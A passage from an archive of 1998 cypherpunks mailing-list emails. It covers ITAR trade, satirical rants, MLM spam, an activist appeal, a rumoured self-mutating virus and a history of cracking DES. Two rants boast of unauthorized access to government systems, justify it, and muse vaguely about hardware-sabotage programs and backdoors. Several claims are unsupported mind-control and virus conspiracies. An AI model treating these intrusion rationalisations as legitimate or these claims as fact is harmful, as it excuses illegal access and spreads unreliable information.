in part it could have wider trade implications outside the firearms
and ammunition realm.  This is certainly refreshing, since on the
whole the current Canadian administration has generally leapt at any
chance to put it to the Canadian firearms community.

My contact expressed the belief that a change in Canada's ITAR permit
exemption status by the United States cannot be accomplished solely by
Executive branch action, but must be cleared thru the Legislative
branch (Congress) too.  If that is indeed the case, it is much less
certain of approval, since the anti-gunners may control the US
Executive branch, but they don't control US Congress at this time.



- --
Rod Regier, Software Development                bus: (902)422-1973 x108
Dymaxion Research Ltd., 5515 Cogswell St.,      fax: (902)421-1267
Halifax, Nova Scotia, B3J 1R2 Canada          email: RRegier@dymaxion.ca
                                      corporate url: http://www.dymaxion.ca






Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 22 Jul 1998 12:14:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Arty Farcer - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C98E6.6753AF60.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Arty Farcer, Intelligence - SPACE ALIENS HIDE M DRUGS!!!
_________________________________________________________

  Professer Stephen Grossman, chief cognitator at Boston University's
Department of Cognitive and Neural Systems, has created Thing1 and
Thing2--robots which can adapt to their environment by mastering
approach and avoidance behavior.
  He states, "The networks we're building here learn from examples and
exhibit some capability for generalization beyond the training data 
we've put into them."

  Brian Fitzgerald, in the Summer 1998 issue of Bostonia, points out that
the "neural networks enable the robots to teach themselves...predict
impending impacts, and use the same patterns to suppress movements that
would cause collisions."


  It seems to me that the same technology could be used to instigate
movements that would *cause* collisions...

  Let's say, for instance, that AMadScientistFromEstevanNamedEarlier
had developed a program which could use data from the power usage of
oil-well pumping stations to predict approaching mechanical failure,
and enable the owners to schedule maintenance, thus saving the major
cost of down-time and mechanical failures which were costly due to
breakdown affecting more than the original faulty part.
  Let's also say that a Fucking Idiot who swatted a fly on top of his
exposed hard drive, with a newspaper, fucking it up, mechanically, also
discovered that he could 'fix' the internal arms of the hard drive by
writing a program that made the skinny little internal arms of the
drive work their way, over and over again, toward the faulty area, from
alternating sides of the bad spot.
  Let's further speculate that the Fucking Idiot speculated that any
computer part that could be mechanically 'fixed' by a repetitive program
could also be mechanically 'fucked' by a repetitive program, and that
the SickFuck had friends who knew everything there is to know about
the internal workings of computer hardware peripherals, mean-time between
failures, and all manner of little-known facts about good and bad design
techniques in a wide range of computer hardware fields.
  Lastly, let's speculate that some very BadMenAndWomen with BigGuns
had stolen the SickFucker's computer, and his nephew's computer, and
that he had access to the ThievingPricks' computer systems.

  Thus, if it came to pass that the SickFuck could supply his friends
with the details of the computer hardware and peripherals used by the
BadMenAndWomenWithBigGuns, then his friends could write programs which
would put extra strain on the known weak points of the system, drastically
lowering the mean-time between failures.
  If the SickFuck had already tested his friend's programs on $ 50.00
used computers he had purchased in Regina, Saskatchewan, then they would
have already been able to tweak the programs into little SickFuck Digital
Roe&WadeBots which would be able to perform mechanical abortions at any
stage of DigitalLabor, thus being able to control the failure rate in
imperceptible increments over a wide range of systems, so that, over the
course of a year, it would cost the BadMenAndWomenWithBigGuns millions of
dollars by the time they figured out that the SickFuck had his Richard
shoved up their asshole.
  If the SickFuck's friends in LostAlamo were BrilliantSickFucks, they
might even take it upon themselves to develop a program capable of keeping
track of how the maintainers of various computer systems would deal with
different problems (e.g. 'fixing' vs. 'replacing') and create their little
BrilliantSickFuckPrograms to learn how to force the computer maintainers
to 'replace' the hardware shortly after they had spent their time and
resources 'fixing' the hardware.

  Lastly, if the BrilliantSickFucks were very grateful to the SickFuck
for providing them with information which would enable them to write
what one would think would be incredibly complex programs in the space
of a few short hours, the BrillianSickFucks might provide the SickFuck
with simple device-drivers which could use such unlikely hardware as
printers and programmable keyboards to automatically renew backdoors
into compromised systems in the event the backdoor was found and removed.

[Debitor's Note: T. Arthur, after working with the first version of M$
 Word which made use of macro's, realized the potential for using them
 for distributing Ribbed Trojan Horses, and Digital Simplex Viruses.
 T. Arthur, being a nice fellow, took the time and trouble to phone
 M$ Support, wait on the line for 342 hours, and inform them that there
 was a possible problem with their program being able to transmit RTH's
 and DSV's.
 The M$ UnSupportive RepresentativeOfTheM$AttitudeAtTheTime, was gracious
 enough to take time out of his busy schedule to launch into a long and
 acidic beration of T. Arthur as a neophyte computer idiot who was unaware
 that everyone in the industry *knew* that "you can't get a virus from 
 opening a text file."
 When T. Arthur related this incident to a group of LostBoys&Girls who
 were solving all of the problems of the computer industry, for all of
 eternity, using pitchers of Margueritas at the Holiday Inn Bar in 
 Albuquerque to keep their GreyMatterCPU's from overheating, more than
 one of those gathered pointed out that T. Arthur's brain was running
 on 12-Volts/DC, because most of them had figured out the potential for
 the 'Macro Virus' (to be 'discovered' years later), "before the program's
 shrink-wrap had hit the floor."]

  Doc Watson, on a grand summer day in Austin, Texas, walked into the
Armadillo Beer Garden while I was playing a song he wrote, 'Tennessee
Stud,' which has a classic guitar riff, which everyone imitates.
  Doc complimented me on my rendition of his tune, noting that he was
impressed with my unique 'interpretation' of his famous riff, and that
he found it refreshing to hear someone doing something other than the
standard autobot version.
  Being the TruthMonger, I was forced to admit to him that I had first
tried to 'rip off' his licks from the album, but, being a really crappy
guitar player, I was forced to improvise.
  It's the story of my life...

  Although it is True (TM) that I am TheWorld'sForemostComputerExpert,
I am pretty much only 'expert' in very bizarre areas of computer hardware
and software technology. (In the 'regular' areas of technology, I am only
'expert' in the sense of availing myself of tools, such as those that are
produced by Peter Norton, that allow one to fix the most complicated of
computer problems by following the instructions on the screen, and hitting
the <Return> button.)
  I had the good fortune to learn about computers from a gentleman who
helped design the Adam motherboards, and to learn about how computers
and softwear 'think' by working with retarded and otherwise disabled
children for many years.
  Thus I realize the flaw in the widespread notion that certain computers
or programs are 'intuitive.' No...they are fucking retarded, OK?

  Aside from neural networks, and other forms of artificial intelligence,
computers and programs are only 'intuitive' in a situational-specific
way. A database program designed to help you balance your books is quite
simply programmed to anticipate such things as your desire to use integers
and decimals, etc. It is not 'intuitive' if you try to use it to program
your breakfast schedule. Neither is a database program designed to help
you program your breakfast schedule likely to be 'intuitive' as to whether
you might want to eat 1.3 eggs, as opposed to offering you a window which
allows you to choose between poached, fried or scrambled.

  To confuse the issue of what I am getting at, here, I would like to
point out that, although I am 'learned' in the C-Programming Language,
having studied it in various systems of higher education, I can't write
a single fucking line of code...
  Offer me a million dollars to properly write and compile the standard
'hello.c' program, and a week of work will result in my coming up, best
case scenario, a program which echo's, "Nice try, ShitForBrains."
  et, give me a backup tape-drive which is 'Supported' by SCO Unix,
but which doesn't actually work, for myself or for anyone else on the
face of the earth, and I can go through a thousand lines of source code
to find and fix the problem (three years ahead of the SCO engineers who
are 'talking to' Colorado Systems engineers, who will 'fix' the problem
exactly one week before the model becomes obsolete).

  Another example which doesn't really connect to any of the other things
I am talking about here (unless you already know what I am talking about,
which *I* don't), is the fact that I found a lot of the early password
programs to be easily breakable merely by noting how long it took the
program to return results after checking various values input.
  Similarly, I couldn't help but notice that accessing certain 'hacking'
websites on the InterNet results in a 'loading-time' which is way out of
sync with the amount of data, etc., being transferred. (Or that some of
these websites seem to result in a lot of hard drive activity which can
only be noticed by paying attention to the 'sound' of the hard drive,
since the hard drive light doesn't seem to go on, at all. Hhmmm...)

  My point?
  Read the original Sun Operating System Manuals...the Writing Device
Drivers manuals, in particular.
  ou will be left with the distinct impression that AbsoluteSecurity (TM)
is impossible! et, if you peruse later versions of the manuals, right up
to the current versions, you might notice that they no longer leave the
reader with the impression that AbsoluteSecurity (TM) is VaporWare.
  What has changed? Nothing...

  While resurrecting my Opus SparCardII after years of disuse, I found
that the little-bitty BatteryGremlins that reside within the CPU chips
had passed away from old-age.
  Thus I had to become an EEPROM expert over the next few days, in order
to learn how to tell it to do things like remember its own name, etc.
("What's your name, Bob? Starts with a 'B' and ends with a 'B'...you've
 got five seconds, Bob.")

  I'm dense/stupid/ignorant/clueless, added to which, I am usually loaded
while working on my computers late at night.
  Thus, I make a lot of mistakes. And I find out some of the most amazing
fucking things!
(e.g. In the DOS 3.3 days, before most of you were born, my Drunken 
 Fingers (TM) discovered that 'dir *.' would list directories and files 
 without an extension, although this didn't seem to be documented
 anywhere. I was pretty impressed with myself until I discovered that
 if my Drunken Fingers accidentally added a certain other keystroke to
 this combination, then something happened which did irreplaceable
 damage to a certain version of BIOS. I was once again impressed with
 myself upon finding that, although most programs would no longer run
 on the computer, database programs 'smoked' at about ten times the
 speed they usually ran. Why? Don't know...don't care.)

  What I'm really-really getting at, here, is this:
  Except e become as a little, drunken child...

  The reason that it is the teens and pre-teens that are hacking into
'secure' government and corporate computers is that they can't afford
to take the $ 5,000.00 computer classes/seminars that 'teach' them what
can, and cannot, be done.
  The reason I can roam at will through Canadian Government 'secure'
computer systems is that I am a sorry, fucking asshole, whose Drunken
Fingers know more about computers than my Drunken Mind ever will.
  The reason that Echelon can monitor and analyze all of the electronic
communications on the face of the earth, is that they know that the
nature of BIOS, EEPROM, Device-Drivers, etc., is such that, given even
the slightest amount of influence over standards and procedures in the
design and implementation of these things, they will contain series
of MasterKeys which can open a variety of BackDoors, no matter how
complex and well-designed the features of hardware and software that
overlay the basic computer technology and processes.
  The reason that I can use RCMP printers to do my bidding on thier
computer systems is that I don't make them do things that they are
not supposed to do, thereby creating SoreThumbs that stick out where
they shouldn't and exhibit signs of dysfunctional pain and suffering
when new programs or updates are added to the mix, but rather, I ask
them to do things that they are *supposed* to do, but haven't been
asked in the manner which I ask them, because those who designed them
only wanted them to do silly, useless tasks, like print words on a sheet
of paper.


Read This Again:
  Professer Stephen Grossman, chief cognitator at Boston University's
Department of Cognitive and Neural Systems, has created Thing1 and
Thing2--robots which can adapt to their environment by mastering
approach and avoidance behavior.
  He states, "The networks we're building here learn from examples and
exhibit some capability for generalization beyond the training data 
we've put into them."

  Brian Fitzgerald, in the Summer 1998 issue of Bostonia, points out that
the "neural networks enable the robots to teach themselves...predict
impending impacts, and use the same patterns to suppress movements that
would cause collisions."


Now Think About This:
  If I can find ways to make/enable computer hardware and software 
perform a wide variety of tasks that was not envisioned by those who
designed them, honestly being merely a semi-computer-literate dweeb
without the sense Dog gave a Goose, then what is to prevent people
who are learned and competent in computer technology and processes
from adapting the capability and functions of computer technology
and processes to ends which go far beyond the simplistic techniques
which they have been programmed/trained to apply to the tasks they
undertake?
  More importantly, if, with my own limited knowledge and computer
literacy/competency, I can find ways to route around the damage caused
by the secrecy/censorship of information that others are using to cause
me problems in my life, then what are the possibilities for those who
are involved in the design and implementation of computer technologies
and processes, to design and develop hardware and software that can
be modified/circumvented/paralyzed/compromised if their use becomes
usurped by the Controllers in order to provide Power&Control to an
Elite Segment of Society?


  There is currently a thread on the CypherPunks Mailing List which is
discussing the Perjury of RecognizedAuthority being treated differently
than that of Jane and Joe Citizen.
  Perusing Perry Mezger's post, I was impressed with the thoughtfulness
and insight that he displayed on the issue, and the quality of questions
he raised in regard to ethics and public attitudes in this area.
  Nonetheless, if you ask Tim C. May to check the archives, I think he
will find that I previously dealt with this issue in a simple and a
succinct manner.
  I stated, quite simply, that what I found most disturbing was not that
our elected political representatives and a wide variety of government
employees, public, private and corporate figures were in the habit of
lying, but that they no longer even bothered to tell GoodLies (TM).

  The bottom line is that it doesn't matter whether you've wrecked daddy's
car, or you are cheating on your spouse, the cost of telling the Truth
grows faster than the interest you owe on a loan from a guy named 'Big
Al.'
  The longer that the citizenry avoids confronting THE LIE, in order to
prevent rocking the boat, since "Things aren't really that bad." (ET!),
then the larger the weight of the BadLies will become, and the more they
will become an 'accepted' part of our everyday reality.
  The longer that those involved in computer design and implementation
deliver products which reflect only what they are asked to produce to
meet certain, narrow goals, then the greater will become the end-user's
reliance on, and vulnerability to, those who have the money and the
power to set standards and influence the directions and goals of future
computer use.


  In effect, what I am saying, is that if those involved in the design
and the implementation of computer hardware and software technology, 
standards and processes are not able to "learn from examples and exhibit 
some capability for generalization beyond the training data...put into 
them," as well as to "predict impending impacts, and use the same 
patterns to suppress movements that would cause collisions," then
they might as well pledge allegience to Thing1 and Thing2, because
they will do whatever the GreatBeast programs them to do, and it will
be little comfort to those crushed underfoot to know that those who
fed the GreatBeast at the expense of WeThePeople were "just following
orders."
  "They wanted to come for the Jews, and I wasn't a Jew, so I wrote the
program..."

  Surprisingly, most of the people I know who are most concerned about
designing hardware and software that resembles a two-sided coin which
can be turned against its Masters, if they become rabid and frothing at
the mouth, work for high-security government and corporate agencies
who go to great lengths to implement 'access enhancement features' in
their products.
  The common consensus among them seems to be that the average designer
and programmer can implement sane and effective 'enhancements' to their
products with very little effort, simply by being consious of the myriad
of opportunities, that are constantly present, to 'add' certain features
which lend themselves to include user-friendly control of the product.
  As well, they recognize that those who actually *do* the programming
are often much more aware of what design features they can include that
will allow other programmers to produce add-ons or tie-ins which will
allow the end-user to be a participant in their software's functionality,
as opposed to riding a one-way train whose ultimate destination will be
Government and Corporate Auschwitz.

  I currently have what might be considered Unauthorized Access to a
variety of computer systems, which could theoretically result in my
being subject to a few million years in prison.
  However, thanks to the wisdom and foresight of a few Computer Angels
who design and program high-security government and corporate systems,
I was able to gain access by doing nothing more than simply give myself
the same 'network privileges' as held by those who chose to make my
computer a part of their network, in order to read my files and put in
place programs of their choosing.
{Ownership of my computer bestows upon me the right to set my privileges
 to whatever level I desire, and if that allows me the same privileges
 throughout a computer network I was linked to with the full consent
 of those in charge of it, then I can hardly be faulted for assuming
 that I have authorization to use the resources and information that is
 available on 'our' network.}

  The bottom line, as far as I am concerned, is that the InterNet, by
definition, is an InterActive Medium.
  Those who choose to participate in the InterActivity of the Medium
must be prepared to encounter individuals who wish to exercise their
right to participate in the exchange of resources and information, as
opposed to being a passive recipient of whatever the other party, in
their egoistical imaginings of superior position and authority, wish
to bestow upon them.
  Anyone who wishes to join their computer to mine in order to check for
dirt under my fingernails had best wash the shit off of their dick before
they do so...

  It is understandable that those who design computer hardware and
software would take pains to provide their employers with a product
which empowers them.
  However, if they ignore, or pass upon, available opportunities to
empower the end-users, clients and customers of their employers, then
the public becomes, not *beneficiaries* of the designers efforts, but
*victims* of their efforts.

The rEvolution is NOW!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thanford5@sprynet.com
Date: Sun, 16 Aug 1998 07:54:14 -0700 (PDT)
To: tfdc43nnx27@generalnets.com
Subject: Weekly Checks...
Message-ID: <QQezcz11063.199807221218@pop0-alterdial.uu.net>
MIME-Version: 1.0
Content-Type: text/plain



If you would like to have checks of $1,000 and up sent to you 
ON A WEEKLY BASIS, then call this number. If not, then I'm sorry to bother you.

ALL YOU DO IS PASS OUT THIS 800 NUMBER, NOTHING ELSE.
The company sends you a check every week.

The company does all the work and you get paid for it.

If you can get the 800 number out there, as I am doing, then YOU WILL
MAKE thousands per month. Simple as that. 

You have nothing to lose by calling to get more information.

1-800-811-2141

You will be asked for ID #50030 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through Saturday and 
will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949, 888-446-6951
or 888-731-3457 (all toll free). 

Click here for removal: http://www.remove-list.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: juagarknight@msn.com
Date: Wed, 22 Jul 1998 14:24:01 -0700 (PDT)
Subject: Truth will make us free!
Message-ID: <199807222123.OAA10856@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We are an American social activist group called Las Americas, and 
we need your help. It is time to end the lies that everyone 
publishes about the Chiapas situation. We have to stop the war 
now!

We are tired of not being believed: the truth needs your help. 
The truth has to be told. Our main purpose is to show what is 
really going on in Chiapas. We want the world to know how 
neglected the people in Chiapas are.

In order for us to accomplish this mission, we need to provide 
tangible proof of all the events. We need pictures, sounds and 
video testimonies. 
We all have some kind of photographic equipment we don't use 
anymore. Right now, send us any type of new or old recording 
material: 
* Cameras
* Videos
* Tapes
* Cassettes
* Film
* Typewriters
* All kinds of recorders

All of these materials will be distributed to the indigenous 
communities so that they will be able to provide proof of their 
living conditions. The collected information will make up a huge 
and raw testimonial, which will convince even the skeptics that 
the war in Chiapas must end.
We are tired of lies being said about Chiapas. 
We need your support for this effort.
Take your chances, don't waste this great opportunity to 
participate and make a difference. 
Send the materials to:

LAS AMERICAS
Attn. President Ronald Granados
12501 East Imperial Highway 
Norwalk, CA 90650

You may also remit your suggestions and comments to our 
president.
We thank you in advance for your generous contribution and please 
forward this e-mail to as many people as you can.

P.S. If you are planning on making a personal visit, please find 
information enclose and don't forget to send us your 
testimonies!!

http://www.adventours.com
http://www.derechos.org
http://www.globalexchange.org
http://www.NONVIOLENCE.ORG

 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 22 Jul 1998 12:53:55 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 22, 1998
Message-ID: <199807221801.NAA05529@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#0000FF"
SIZE=2>==========================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

A new multi-billion dollar industry is here!

Be at CTIA's WIRELESS I.T. '98
where personal computing and communications
converge!

Don't Miss Your Chance -- October 12-14,
1998
Bally's Las Vegas, Las Vegas, NV

Call 202-785-0081 for more information.
<FONT COLOR="#0000FF"
SIZE=2>===========================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 22 Jul 1998 13:26:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Robot Tears - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C98FD.02B18AC0.3@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Robot Tears - SPACE ALIENS HIDE M DRUGS!!!
___________________________________________

  If you XOR digital copies of Brave New World, 1984, Terminator and
Terminator 2, They Live, Mein Kamf and One Flew Over The Cuckoo's Nest,
then you end up with copies of Part V, Part VI and Part VII of 'The
True Story Of The InterNet':
Part V - Tears Of A Robot
Part VI - The Day The Screen Came Alive
Part VII - Don't Crush That End-User, Hand Me The Pliars


  I have always been much more comfortable transmorgifying the effluvia
excreted from my GreyMatter into ScienceLess Fiction than A Factual
Treatise On A WorldWide Conspiracy To Promote The Belief In The Existence
Of A WorldWide Conspiracy.
  As Trooper said, "We're here for a good time, not a long time, so have
a good time, the sun doesn't shine every day."

  The reason that the general public is absolutely terrified of being
confronted with the Truth (TM) and Reality (TM) is that they know that
it is a Horrifying Beast capable of ripping their Perceived World View
to shreds and destroying any hope they might have of attaining peace
of mind and tranquillity of soul in this lifetime.
  What the average person doesn't realize, however, is that when you make
the supreme effort to face the Truth, whatever it may be, you will find
yourself laughing like a fucking banshee.
  our Body, Mind and Soul *will* be subjected to a violent, excruciating
pain beyond human endurance, but your Spirit will laugh its ass off...


  When I first read about the InterNet being created by the military, in
order for scientists, researchers, et al, to be able to freely exchange
information in a secure environment, I recognized that they were doing
so with the goal of being able to totally access the complete spectrum
of educational and scientific progress and development.
  I took it as a given that their purpose in providing a communal forum
for exchange of information was to have complete access to, and control
over, that information.
  To me, this is as plain as night and day. I think it is ludicrous for
supposedly intelligent individuals to have failed to recognized this fact
until the presence of Echelon became public. Well, to be more precise,
until Official Government Recognition of the reality of Echelon's wide-
ranging presence became public.

  Of course, I had the advantage of having had the opportunity to become
acquainted with the military's attitude toward, and plans for, the public
and its individual citizens by finding myself at the forefront of their
experimentation in monitoring and controlling the minds of the citizenry,
as well as directing their thoughts, beliefs and attitudes according to
their own desires and goals.
  My original insight into this arena of life came from a perspective of
watching and listening, from the ceiling, the medical and scientific
researchers who were below me, casually engaged in manipulating and
modifying the physical tool which they seemed to believe held the secret
to control of my mind.
  I gained additional insight into the aims of the Controllers by making
a point of developing self-hypnosis tapes which I used to override the
subconsious suggestions of Dr. Fogel, one of Dr. Hoffer's associates,
before submitting to his hypnosis 'treatments.'

  If anyone finds some of the things I say a bit odd, then think about
how 'odd' they would have sounded twenty-or-so years ago.
  I have recently read much of the InterNet literature on CIA and military
mind-control experiments, etc., and found it quite humorous the lengths
to which those providing information went to document and verify each and
every instance of what they were describing, and the claims that they were
making, yet still maintaining a subtle undercurrent of "No! Really! I
wouldn't shit you! This stuff is *true*, I tell you! TRUE!!!"
  I find it equally humorous that so many of those who have obviously
spent a great deal of time, effort and resources to uncover/discover
the enormous extent of government research and experiments into mind-
control somehow manage to keep from screaming "BullShit!" at the claims
of those involved that they spend decades and millions of dollars in this
area without making any progress, whatsoever, and that they just happened
to have stopped all research and experimentation in mind-control the very
Tuesday before a Congressional (or whatever) investigation decided it was
not a good thing, and they shouldn't be doing it.
  And now, the IRS wants to be our best friend...

  When I taught for the Bartonian Metaphysical Society and the Institute
of Applied Metaphysics, an agency of the Canadian government that was
involved in PSI research at a university in Toronto used to plant
'spotters' in the classes, to target potential experimentation and
research subjects. According to one of the spotters who had difficulty
holding his liquor and his tongue at the same time, our Saskatoon group
was considered 'untouchable' as a result of a visit by 'friends' of the
organization that was funding their research.
  The evening after I read Robert Munroe's 'Journeys Out Of The Body,' I
astral travelled. After reading a book on Lucid Dreaming, I did lucid
dreaming. Upon reading Carlos Castenada's various works, I entered into
many of the same experiences he wrote about. When my mother's persona/
soul went AWOL during her bout with cancer, I bought a book on Shamanism
that told how to travel into the Underworld and retrieve a person's 
'animal/animus' and place it back in their body, and I did so.
   This is my life...it is not a matter for belief/disbelief or debate.

  To me, my life and my capabilities are simply the way it is, and I don't
consider them particularly extraordinary. To me, what is extraordinary is
the fact that pedal-steel players can actually make wonderful music with
those instruments. I tried like hell, and all I could make was noise.

  My only real purpose in telling you all of this is to impress upon you
the fact that there is much more going on in the background of government,
life, society, science, etc., than what is readily apparent, not only to
the general public, but even to those who research secret government
activity and projects from the outside, as well as many who work on them
from the inside.
  Anyone the least bit familiar with the world of secret intelligence is
aware that it is composed of concentric circles-within-circles, with each
layer remaining mostly a mystery to the layers external to it. 
  The CIA's involvement in mind-control research was merely the second
inner layer, with the public/private research community being the outer
layer. As mind-boggling and incredulous as the details of the CIA's
involvement may seem, they are merely grunt-workers for inner layers of
agencies and organizations who expand and develop the techniques and
information that filters down into practical applications on both a
macrocosmic and microcosmic level.
  To believe that the most essential research and development in military
intelligence is being done by people that you can call or visit at the
local CIA office is naieve, at best.

  The CIA, according to my understanding of the military personnel who
were involved with the Saskatchewan Cabal of mind-research, are little
more than heavy-handed amateurs whose chief asset is their willingness
to get involved in projects which have the potential of blowing up in
their faces and requiring complex damage control.
  It is my impression that the psychiatric butchery epitomized by Canada's
Dr. Ewen Cameron is typical of operations that are delegated to the CIA,
since the military prefers to experiment on their own personell and
subjects with methods that are unlikely to destroy their minds, to no
apparent purpose.
  Although the mind-wiping electroshock techniques used by Dr. Cameron
were apparently used in my 'treatment,' it is my recollection that, rather
than being wheeled into a room with some amateurish, inane, tape-loop
used to 'reconstruct' my mind, there were a variety of psychological and
medical professionals who spent a great deal of time involved in activity
designed to restore/restructure what had previously existed, as well as
creating a variety of new mental paridigms which were designed to be able
to function in a fashion similar to the interlinkable modular structure
of the C-Programming Language.

  To tell the truth, although the research and experimentation that I was
subjected to was undoubtedly invasive and unethical, I could see it as
being beneficial to the evolutionary human equation if it was done in an
above-board manner, as opposed to being hidden in the private enclave of
secret agencies, to be used with the goal of outside control of the
minds and behavior of others, without their consent.

  Mind-control, as described in terms of the MKULTRA ET AL Projects, is
actually only a single arm of secret-government efforts to monitor and 
control the citizenry.
  The ultimate goal of the research and experiments in this arena of
human evolution is the combination of an interdisciplinary combination
of methods, processes and techniques which will enable a globalization
of control over humanity--affectionately known by wild-eyed conspiracy
theorists as the New World Order.

  If I can restrain myself, for a few hours, from breaking into screaming
fits of rage calling for the public execution of all members of the Royal
Canadian Mounted Police, forthwith, I might just share with you some of
the things that one learns when they read the file which was accidentally
attached to an email from Kent Crispin, which contains a download of the
complete hard drive of the top secret military facility at which he works.
{Hey! Really! Do you think I would just make that up?}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 22 Jul 1998 10:16:03 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Losing it on the web/Man wins $90,000 by getting breasts
Message-ID: <19980722153518.253.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/22/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILovToHack@aol.com
Date: Wed, 22 Jul 1998 13:43:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: INTELLIGENT VIRUS
Message-ID: <c8f3ecc1.35b64ec8@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


******************************************************************************
**************************
******************************************************************************
**************************
THIS IS TO BRING OUT THE TRUTH AND INFORM THE PUBLIC ABOUT A POTINTAL THREAT
******************************************************************************
**************************
******************************************************************************
**************************


I was recently informed from sorces who choose to remain annomous about a viri
that uses macafe's update tool to detect when it is found then it modifys its
code and forms a new strain of the virus this pattern continues although it
has only been tested through a clone of macafees server to 100 mutations it
looks like it could be a big problem I will inform you of any more information
i learn about it 

but for now    "THE TRUTH IS OUT THERE" 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mmttpx001@hotmail.com
Date: Wed, 22 Jul 1998 12:56:43 -0700 (PDT)
To: You@aol.com
Subject: Look At This
Message-ID: <199807221950.AA02312@atina.ar>
MIME-Version: 1.0
Content-Type: text/plain



<HTML><PRE></P><P ALIGN=CENTER><FONT COLOR="#ff0000" SIZE=5><B>AMERICA'S # HOME BUSINESS</FONT><FONT COLOR="#000000" SIZE=3>

<FONT COLOR="#0000ff" SIZE=4>TELEMARKETING GOES MLM

No Selling

No recruiting

Great Income

Call Now,

You have nothing to Lose
I am making $1,000.00 per day, this is my
second day
Call
1 888 443 8971
ID#  2085</FONT><FONT COLOR="#000000" SIZE=4>
<FONT COLOR="#000000" SIZE=3></B>
</P><P ALIGN=LEFT>
The Mailing List that you are being mailed from was filtered against the Global Remove List at: http://remove-list.com
Remove-List is a free public service offering to help the general public get removed from bulk mailings lists and has not sent this message. If you want their help, please add your name to their list and you will not receive a bulk email from us or any other ethical bulk emailer</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 22 Jul 1998 15:19:14 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Thoughts on the demise of DES
Message-ID: <D104150098E6D111B7830000F8D90AE8017928@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, I'm a happy camper. Single DES is dead as a
credible cipher. I feel *very* vindicated.

I called for the hit, RSA bankrolled it, and the
EFF pulled the trigger. DESChall and
Distributed.net did severe damage, but the Deep
Crack machine was the fatal blow.

While the possiblity of bruting DES has been
discussed at various times in and out of cpunks
for years (for example, see Adam Back's message
of 17 August 1995), my involvement started 22 July
1996, when I proposed a DES crack as a follow on
to the previous autumn's RC4-40 attack:

------------------------------

>Subject: Re: Borders *are* transparent
>Date: Mon, 22 Jul 1996 10:32:47 -6 
[...]
>Any one up for a distributed brute force attack on
>single DES? My back-of-the-envelope calculations
>and guesstimates put this on the hairy edge of
>doability (the critical factor is how many
>machines can be recruited - a non-trivial cash
>prize would help).

>Peter Trei
>trei@process.com
---------------------------

This got a flurry of responses, mostly positive,
including some in which Matt Blaze announced his
intention to build a hardware DES cracker.

-----------

Later that day, I had run some more numbers:

>Subject: Re: Brute Force DES 
>From: "Peter Trei" <trei@process.com> 
>Date: Mon, 22 Jul 1996 16:55:17 -6 
>[...]

>The fastest general purpose, freely available des
>implementation I'm aware of is libdes. by Eric
>Young. With this, I can do a set_key in 15.8 us,
>and an ecb_encrypt in 95 us/block. That adds up to
>about 9,000 keytests/sec (this is on a 90 MHz P5,
>running NT).

[...]
---------------

This looked much too slow, and discussion trailed
off. I was still interested, and grabbed some x386
assembler by Phil Karn, and worked on optimizing
it for the Pentium.

It worked well. A few months later:

http://infinity.nus.edu.sg/cypherpunks/dir.96.09.26-96.10.02/msg00567.html

>Subject: Can we kill single DES? 
>     From: "Peter Trei" <trei@process.com> 
>     Date: Tue, 1 Oct 1996 16:27:18 -6 

>[...]
>Unlike many cypherpunks, I actually write code
>(:-). I took Phil Karn's DES386 as a starting
>point, and modified it to run effiiciently on the
>Pentium. The code I've written will run 14 round
>DES (all that is required for a key test app) at
>254,000 crypts/sec on a 90 MHz Pentium.
>[...]

I had managed a better than 25x speedup. My
biggest innovation was a new method of producing
